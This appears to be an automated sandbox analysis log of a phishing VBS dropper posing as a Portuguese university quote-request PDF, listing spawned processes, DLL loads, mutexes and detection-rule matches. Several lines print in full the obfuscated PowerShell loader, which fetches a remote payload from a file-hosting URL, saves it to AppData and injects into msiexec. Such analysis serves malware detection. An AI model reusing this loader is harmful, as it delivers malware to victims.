'trasuHap SAllee CitRSkir-W,enAAnglg,azaE KienZilcT';$tvangsauktioners=Udgangspositioner 'Cor h DattCytotBidsparbes end: ejo/A ti/ BeadA.virManlicosmv oreEp e.SnurgRev oIsobo emegKno l s,geDial.P ntcLeiboHonemK od/Bedru,nuscTviv? imeJud.xPlotpZon,oGre rUpaatProd= .omdKi.eopimpw Obsnb nslH.peoXiphaParhd,alu&TaphiCitrdKaro=betj1com,LIndeWStegp O aU Non1HaanPPe,aK InsLA sb-unrePEp,p-Bun E S hM ien6For L ArttR getDannkmargmFo hC aks2Trit2 VadK ApoNR covcougMSiet9UnreQtrice SenSstri8Sup Z';$Nonvernaculardeologikritik=Udgangspositioner ' Coe>';$Tunneldalenes=Udgangspositioner ' GruiDra,eOutsX';$Miaow='Besvarer237';$Minium='\prostituaqr.Und';Speave227 (Udgangspositioner 'Pr r$ PregYardlSeino CutbDi taBrowlAcri:SootiAmebn TitDG.ifiT.bua MayN .smeArguRTyveSSmer=Tris$.ndgEValfNSkagvSter: heAGratp atupToxiD AmmAAur.TCoenaFlot+ gou$Romam ho i L,knUnp,i priuBiocm');Speave227 (Udgangspositioner 'Unsy$Styrg Re LStepoLoweb,ueea veLRefu:HaratA,azr ,olyTimoP arvaLa,erValgsDampaSyncmRudeiCe sdBaptENons=Husb$Gruntsha vEmdaa FranEurygMaissoleaABi tuEr.vKFibeT ,asI rthOGittnBa seDdmarUn uSklim.BirisTrykPDis,lStnkiInteTNumm( Gil$DracnM alOPur nSubcVBe dE Disr nagNunreadefic ApoUSal,lInstaErgor ptedSabbE he oHec,l andOLophG redISparkBe,sR In i SemTIndtICh lKTwen)');Speave227 (Udgangspositioner $Fodnoter);$tvangsauktioners=$Tryparsamide[0];$Snefogets=(Udgangspositioner ' Udv$SemiGIchtl R fOFremB RrlaWantlAldi: d,fFW odOM,ckrBrysTDysgSDo oT.iglt Pa.E ras=R banFamiE .odW Ta,-dandoCheaBVisnj None R cCAksitanti Pa.as,okuYTeknSIntetChamE Rysm ove. Jyd$Tyl B OveRF eln AnkeUntrLAdopRMockd Zebo
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Overkindly;function Speave227($Posttypernes){ .($Tunneldalenes) ($Posttypernes)} function Udgangspositioner($Luftpudebaadenes92){$Nonvernacular=4;do{$Zoogeological+=$Luftpudebaadenes92[$Nonvernacular];$Nonvernacular+=5;$Underbodies119=Format-List} until(!$Luftpudebaadenes92[$Nonvernacular])$Zoogeological}$Brnelrdommene=Udgangspositioner 'Ru,lnMilie routTils. So.W';$Brnelrdommene+=Udgangspositioner ' UngEGallbKoercT,lel Ot,iIn.le SkeN eflt';$Entrewernes=Udgangspositioner 'TromMProtoAttezPo tiPe.dlUnqul S ra Dis/';$Seaboards=Udgangspositioner 'B slT AvilBlodsAuto1alle2';$Fodnoter=' .ag[Del NKnogEAmidTMa e.NedrSdemoe,izzrT ngv ndyi,ijocMngdeBortPSparO abliOvernAf,otGambMChokAShenNSk faOb oGBr dEActiRForv] M t:Knys:EnvesFinmEBoggcD eluRetyrSta IE.eit yrYStniPLoverMercoRickT OproSci CFarmOSkraLMaxi=Unde$AsidS omED kuAM dsB eigO Af,AMe lrTonedReeds';$Entrewernes+=Udgangspositioner 'Trin5Sa g.Lite0 Sam Af a(CamoWPol i ktinStrudinddo Su.wTelesCanc orthN PrsT nou Is.1 st 0 Nar.caut0Dfa.;Unsa mandWFloriDedunSort6Uni 4,niv;Goll .iox Akt6Fu,s4Solo;Twit slir adivTale:Cali1Anti3 lux4In o.Prov0A.ts) Far ScieGKommebortc U ikCrysoU.de/Stru2Sawb0Mis.1Sulc0 Adj0quiz1Do n0Worm1 Spi ,locFSnusiLabirLykkeKrypfbastoMillxJayw/ ypo1S ap3 Eks4Fluo.Citr0';$Netproblem=Udgangspositioner 'trasuHap SAllee CitRSkir-W,enAAnglg,azaE KienZilcT';$tvangsauktioners=Udgangspositioner 'Cor h DattCytotBidsparbes end: ejo/A ti/ BeadA.virManlicosmv oreEp e.SnurgRev oIsobo emegKno l s,geDial.P ntcLeiboHonemK od/Bedru,nuscTviv? imeJud.xPlotpZon,oGre rUpaatProd= .omdKi.eopimpw Obsnb nslH.peoXiphaParhd,alu&TaphiCitrdKaro=betj1com,LIndeWStegp O aU Non1HaanPPe,aK InsLA sb-unrePEp,p-Bun E S hM ien6For L ArttR getDannkmargmFo hC aks2Trit2 VadK ApoNR covcougMSiet9UnreQtrice SenSstri8Sup Z';$Nonvernaculardeologikritik=Udgangspositioner ' Coe>';$Tunneldalenes=Udgangspositioner ' GruiDra,eOutsX';$Miaow='Besvarer237';$Minium='\prostituaqr.Und';Speave227 (Udgangspositioner 'Pr r$ PregYardlSeino CutbDi taBrowlAcri:SootiAmebn TitDG.ifiT.bua MayN .smeArguRTyveSSmer=Tris$.ndgEValfNSkagvSter: heAGratp atupToxiD AmmAAur.TCoenaFlot+ gou$Romam ho i L,knUnp,i priuBiocm');Speave227 (Udgangspositioner 'Unsy$Styrg Re LStepoLoweb,ueea veLRefu:HaratA,azr ,olyTimoP arvaLa,erValgsDampaSyncmRudeiCe sdBaptENons=Husb$Gruntsha vEmdaa FranEurygMaissoleaABi tuEr.vKFibeT ,asI rthOGittnBa seDdmarUn uSklim.BirisTrykPDis,lStnkiInteTNumm( Gil$DracnM alOPur nSubcVBe dE Disr nagNunreadefic ApoUSal,lInstaErgor ptedSabbE he oHec,l andOLophG redISparkBe,sR In i SemTIndtICh lKTwen)');Speave227 (Udgangspositioner $Fodnoter);$tvangsauktioners=$Tryparsamide[0];$Snefogets=(Udgangspositioner ' Udv$SemiGIchtl R fOFremB RrlaWantlAldi: d,fFW odOM,ckrBrysTDysgSDo oT.iglt Pa.E ras=R banFamiE .odW Ta,-dandoCheaBVisnj None R cCAksitanti Pa.as,okuYTeknSIntetChamE Rysm ove. Jyd$Tyl B OveRF eln AnkeUntrLAdopRMockd ZeboJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFABC4ACD024_2_00007FFABC4ACD02
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFABC4ABF564_2_00007FFABC4ABF56
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_02ECE6A814_2_02ECE6A8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_02ECEF7814_2_02ECEF78
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_02ECE36014_2_02ECE360
              Source: PEDIDO DE OR#U00c7AMENTO (Universidade NOVA de Lisboa) 03-10-2025#U00b7pdf.vbsInitial sample: Strings found which are bigger than 50
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6110
              Source: unknownProcess created: Commandline size = 6110
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6110Jump to behavior
              Source: amsi64_7608.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: amsi32_3064.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7608, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 3064, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.troj.expl.evad.winVBS@13/12@4/4
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\prostituaqr.UndJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3816:120:WilError_03
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-5VYA3J
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7616:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7528:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w4wxjqwd.p5u.ps1Jump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PEDIDO DE OR#U00c7AMENTO (Universidade NOVA de Lisboa) 03-10-2025#U00b7pdf.vbs"
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process Where Name = 'explorer.exe'
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7608
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=3064
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: PEDIDO DE OR#U00c7AMENTO (Universidade NOVA de Lisboa) 03-10-2025#U00b7pdf.vbsVirustotal: Detection: 16%
              Source: PEDIDO DE OR#U00c7AMENTO (Universidade NOVA de Lisboa) 03-10-2025#U00b7pdf.vbsReversingLabs: Detection: 13%
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PEDIDO DE OR#U00c7AMENTO (Universidade NOVA de Lisboa) 03-10-2025#U00b7pdf.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping Host_6637.6637.6637.657e
              Source: C:\Windows\System32\PING.EXEProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Overkindly;function Speave227($Posttypernes){ .($Tunneldalenes) ($Posttypernes)} function Udgangspositioner($Luftpudebaadenes92){$Nonvernacular=4;do{$Zoogeological+=$Luftpudebaadenes92[$Nonvernacular];$Nonvernacular+=5;$Underbodies119=Format-List} until(!$Luftpudebaadenes92[$Nonvernacular])$Zoogeological}$Brnelrdommene=Udgangspositioner 'Ru,lnMilie routTils. So.W';$Brnelrdommene+=Udgangspositioner ' UngEGallbKoercT,lel Ot,iIn.le SkeN eflt';$Entrewernes=Udgangspositioner 'TromMProtoAttezPo tiPe.dlUnqul S ra Dis/';$Seaboards=Udgangspositioner 'B slT AvilBlodsAuto1alle2';$Fodnoter=' .ag[Del NKnogEAmidTMa e.NedrSdemoe,izzrT ngv ndyi,ijocMngdeBortPSparO abliOvernAf,otGambMChokAShenNSk faOb oGBr dEActiRForv] M t:Knys:EnvesFinmEBoggcD eluRetyrSta IE.eit yrYStniPLoverMercoRickT OproSci CFarmOSkraLMaxi=Unde$AsidS omED kuAM dsB eigO Af,AMe lrTonedReeds';$Entrewernes+=Udgangspositioner 'Trin5Sa g.Lite0 Sam Af a(CamoWPol i ktinStrudinddo Su.wTelesCanc orthN PrsT nou Is.1 st 0 Nar.caut0Dfa.;Unsa mandWFloriDedunSort6Uni 4,niv;Goll .iox Akt6Fu,s4Solo;Twit slir adivTale:Cali1Anti3 lux4In o.Prov0A.ts) Far ScieGKommebortc U ikCrysoU.de/Stru2Sawb0Mis.1Sulc0 Adj0quiz1Do n0Worm1 Spi ,locFSnusiLabirLykkeKrypfbastoMillxJayw/ ypo1S ap3 Eks4Fluo.Citr0';$Netproblem=Udgangspositioner 'trasuHap SAllee CitRSkir-W,enAAnglg,azaE KienZilcT';$tvangsauktioners=Udgangspositioner 'Cor h DattCytotBidsparbes end: ejo/A ti/ BeadA.virManlicosmv oreEp e.SnurgRev oIsobo emegKno l s,geDial.P ntcLeiboHonemK od/Bedru,nuscTviv? imeJud.xPlotpZon,oGre rUpaatProd= .omdKi.eopimpw Obsnb nslH.peoXiphaParhd,alu&TaphiCitrdKaro=betj1com,LIndeWStegp O aU Non1HaanPPe,aK InsLA sb-unrePEp,p-Bun E S hM ien6For L ArttR getDannkmargmFo hC aks2Trit2 VadK ApoNR covcougMSiet9UnreQtrice SenSstri8Sup Z';$Nonvernaculardeologikritik=Udgangspositioner ' Coe>';$Tunneldalenes=Udgangspositioner ' GruiDra,eOutsX';$Miaow='Besvarer237';$Minium='\prostituaqr.Und';Speave227 (Udgangspositioner 'Pr r$ PregYardlSeino CutbDi taBrowlAcri:SootiAmebn TitDG.ifiT.bua MayN .smeArguRTyveSSmer=Tris$.ndgEValfNSkagvSter: heAGratp atupToxiD AmmAAur.TCoenaFlot+ gou$Romam ho i L,knUnp,i priuBiocm');Speave227 (Udgangspositioner 'Unsy$Styrg Re LStepoLoweb,ueea veLRefu:HaratA,azr ,olyTimoP arvaLa,erValgsDampaSyncmRudeiCe sdBaptENons=Husb$Gruntsha vEmdaa FranEurygMaissoleaABi tuEr.vKFibeT ,asI rthOGittnBa seDdmarUn uSklim.BirisTrykPDis,lStnkiInteTNumm( Gil$DracnM alOPur nSubcVBe dE Disr nagNunreadefic ApoUSal,lInstaErgor ptedSabbE he oHec,l andOLophG redISparkBe,sR In i SemTIndtICh lKTwen)');Speave227 (Udgangspositioner $Fodnoter);$tvangsauktioners=$Tryparsamide[0];$Snefogets=(Udgangspositioner ' Udv$SemiGIchtl R fOFremB RrlaWantlAldi: d,fFW odOM,ckrBrysTDysgSDo oT.iglt Pa.E ras=R banFamiE .odW Ta,-dandoCheaBVisnj None R cCAksitanti Pa.as,okuYTeknSIntetChamE Rysm ove. Jyd$Tyl B OveRF eln AnkeUntrLAdopRMockd Zebo
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Overkindly;function Speave227($Posttypernes){ .($Tunneldalenes) ($Posttypernes)} function Udgangspositioner($Luftpudebaadenes92){$Nonvernacular=4;do{$Zoogeological+=$Luftpudebaadenes92[$Nonvernacular];$Nonvernacular+=5;$Underbodies119=Format-List} until(!$Luftpudebaadenes92[$Nonvernacular])$Zoogeological}$Brnelrdommene=Udgangspositioner 'Ru,lnMilie routTils. So.W';$Brnelrdommene+=Udgangspositioner ' UngEGallbKoercT,lel Ot,iIn.le SkeN eflt';$Entrewernes=Udgangspositioner 'TromMProtoAttezPo tiPe.dlUnqul S ra Dis/';$Seaboards=Udgangspositioner 'B slT AvilBlodsAuto1alle2';$Fodnoter=' .ag[Del NKnogEAmidTMa e.NedrSdemoe,izzrT ngv ndyi,ijocMngdeBortPSparO abliOvernAf,otGambMChokAShenNSk faOb oGBr dEActiRForv] M t:Knys:EnvesFinmEBoggcD eluRetyrSta IE.eit yrYStniPLoverMercoRickT OproSci CFarmOSkraLMaxi=Unde$AsidS omED kuAM dsB eigO Af,AMe lrTonedReeds';$Entrewernes+=Udgangspositioner 'Trin5Sa g.Lite0 Sam Af a(CamoWPol i ktinStrudinddo Su.wTelesCanc orthN PrsT nou Is.1 st 0 Nar.caut0Dfa.;Unsa mandWFloriDedunSort6Uni 4,niv;Goll .iox Akt6Fu,s4Solo;Twit slir adivTale:Cali1Anti3 lux4In o.Prov0A.ts) Far ScieGKommebortc U ikCrysoU.de/Stru2Sawb0Mis.1Sulc0 Adj0quiz1Do n0Worm1 Spi ,locFSnusiLabirLykkeKrypfbastoMillxJayw/ ypo1S ap3 Eks4Fluo.Citr0';$Netproblem=Udgangspositioner 'trasuHap SAllee CitRSkir-W,enAAnglg,azaE KienZilcT';$tvangsauktioners=Udgangspositioner 'Cor h DattCytotBidsparbes end: ejo/A ti/ BeadA.virManlicosmv oreEp e.SnurgRev oIsobo emegKno l s,geDial.P ntcLeiboHonemK od/Bedru,nuscTviv? imeJud.xPlotpZon,oGre rUpaatProd= .omdKi.eopimpw Obsnb nslH.peoXiphaParhd,alu&TaphiCitrdKaro=betj1com,LIndeWStegp O aU Non1HaanPPe,aK InsLA sb-unrePEp,p-Bun E S hM ien6For L ArttR getDannkmargmFo hC aks2Trit2 VadK ApoNR covcougMSiet9UnreQtrice SenSstri8Sup Z';$Nonvernaculardeologikritik=Udgangspositioner ' Coe>';$Tunneldalenes=Udgangspositioner ' GruiDra,eOutsX';$Miaow='Besvarer237';$Minium='\prostituaqr.Und';Speave227 (Udgangspositioner 'Pr r$ PregYardlSeino CutbDi taBrowlAcri:SootiAmebn TitDG.ifiT.bua MayN .smeArguRTyveSSmer=Tris$.ndgEValfNSkagvSter: heAGratp atupToxiD AmmAAur.TCoenaFlot+ gou$Romam ho i L,knUnp,i priuBiocm');Speave227 (Udgangspositioner 'Unsy$Styrg Re LStepoLoweb,ueea veLRefu:HaratA,azr ,olyTimoP arvaLa,erValgsDampaSyncmRudeiCe sdBaptENons=Husb$Gruntsha vEmdaa FranEurygMaissoleaABi tuEr.vKFibeT ,asI rthOGittnBa seDdmarUn uSklim.BirisTrykPDis,lStnkiInteTNumm( Gil$DracnM alOPur nSubcVBe dE Disr nagNunreadefic ApoUSal,lInstaErgor ptedSabbE he oHec,l andOLophG redISparkBe,sR In i SemTIndtICh lKTwen)');Speave227 (Udgangspositioner $Fodnoter);$tvangsauktioners=$Tryparsamide[0];$Snefogets=(Udgangspositioner ' Udv$SemiGIchtl R fOFremB RrlaWantlAldi: d,fFW odOM,ckrBrysTDysgSDo oT.iglt Pa.E ras=R banFamiE .odW Ta,-dandoCheaBVisnj None R cCAksitanti Pa.as,okuYTeknSIntetChamE Rysm ove. Jyd$Tyl B OveRF eln AnkeUntrLAdopRMockd Zebo
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: unknownProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping Host_6637.6637.6637.657eJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Overkindly;function Speave227($Posttypernes){ .($Tunneldalenes) ($Posttypernes)} function Udgangspositioner($Luftpudebaadenes92){$Nonvernacular=4;do{$Zoogeological+=$Luftpudebaadenes92[$Nonvernacular];$Nonvernacular+=5;$Underbodies119=Format-List} until(!$Luftpudebaadenes92[$Nonvernacular])$Zoogeological}$Brnelrdommene=Udgangspositioner 'Ru,lnMilie routTils. So.W';$Brnelrdommene+=Udgangspositioner ' UngEGallbKoercT,lel Ot,iIn.le SkeN eflt';$Entrewernes=Udgangspositioner 'TromMProtoAttezPo tiPe.dlUnqul S ra Dis/';$Seaboards=Udgangspositioner 'B slT AvilBlodsAuto1alle2';$Fodnoter=' .ag[Del NKnogEAmidTMa e.NedrSdemoe,izzrT ngv ndyi,ijocMngdeBortPSparO abliOvernAf,otGambMChokAShenNSk faOb oGBr dEActiRForv] M t:Knys:EnvesFinmEBoggcD eluRetyrSta IE.eit yrYStniPLoverMercoRickT OproSci CFarmOSkraLMaxi=Unde$AsidS omED kuAM dsB eigO Af,AMe lrTonedReeds';$Entrewernes+=Udgangspositioner 'Trin5Sa g.Lite0 Sam Af a(CamoWPol i ktinStrudinddo Su.wTelesCanc orthN PrsT nou Is.1 st 0 Nar.caut0Dfa.;Unsa mandWFloriDedunSort6Uni 4,niv;Goll .iox Akt6Fu,s4Solo;Twit slir adivTale:Cali1Anti3 lux4In o.Prov0A.ts) Far ScieGKommebortc U ikCrysoU.de/Stru2Sawb0Mis.1Sulc0 Adj0quiz1Do n0Worm1 Spi ,locFSnusiLabirLykkeKrypfbastoMillxJayw/ ypo1S ap3 Eks4Fluo.Citr0';$Netproblem=Udgangspositioner 'trasuHap SAllee CitRSkir-W,enAAnglg,azaE KienZilcT';$tvangsauktioners=Udgangspositioner 'Cor h DattCytotBidsparbes end: ejo/A ti/ BeadA.virManlicosmv oreEp e.SnurgRev oIsobo emegKno l s,geDial.P ntcLeiboHonemK od/Bedru,nuscTviv? imeJud.xPlotpZon,oGre rUpaatProd= .omdKi.eopimpw Obsnb nslH.peoXiphaParhd,alu&TaphiCitrdKaro=betj1com,LIndeWStegp O aU Non1HaanPPe,aK InsLA sb-unrePEp,p-Bun E S hM ien6For L ArttR getDannkmargmFo hC aks2Trit2 VadK ApoNR covcougMSiet9UnreQtrice SenSstri8Sup Z';$Nonvernaculardeologikritik=Udgangspositioner ' Coe>';$Tunneldalenes=Udgangspositioner ' GruiDra,eOutsX';$Miaow='Besvarer237';$Minium='\prostituaqr.Und';Speave227 (Udgangspositioner 'Pr r$ PregYardlSeino CutbDi taBrowlAcri:SootiAmebn TitDG.ifiT.bua MayN .smeArguRTyveSSmer=Tris$.ndgEValfNSkagvSter: heAGratp atupToxiD AmmAAur.TCoenaFlot+ gou$Romam ho i L,knUnp,i priuBiocm');Speave227 (Udgangspositioner 'Unsy$Styrg Re LStepoLoweb,ueea veLRefu:HaratA,azr ,olyTimoP arvaLa,erValgsDampaSyncmRudeiCe sdBaptENons=Husb$Gruntsha vEmdaa FranEurygMaissoleaABi tuEr.vKFibeT ,asI rthOGittnBa seDdmarUn uSklim.BirisTrykPDis,lStnkiInteTNumm( Gil$DracnM alOPur nSubcVBe dE Disr nagNunreadefic ApoUSal,lInstaErgor ptedSabbE he oHec,l andOLophG redISparkBe,sR In i SemTIndtICh lKTwen)');Speave227 (Udgangspositioner $Fodnoter);$tvangsauktioners=$Tryparsamide[0];$Snefogets=(Udgangspositioner ' Udv$SemiGIchtl R fOFremB RrlaWantlAldi: d,fFW odOM,ckrBrysTDysgSDo oT.iglt Pa.E ras=R banFamiE .odW Ta,-dandoCheaBVisnj None R cCAksitanti Pa.as,okuYTeknSIntetChamE Rysm ove. Jyd$Tyl B OveRF eln AnkeUntrLAdopRMockd ZeboJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptnet.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cabinet.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
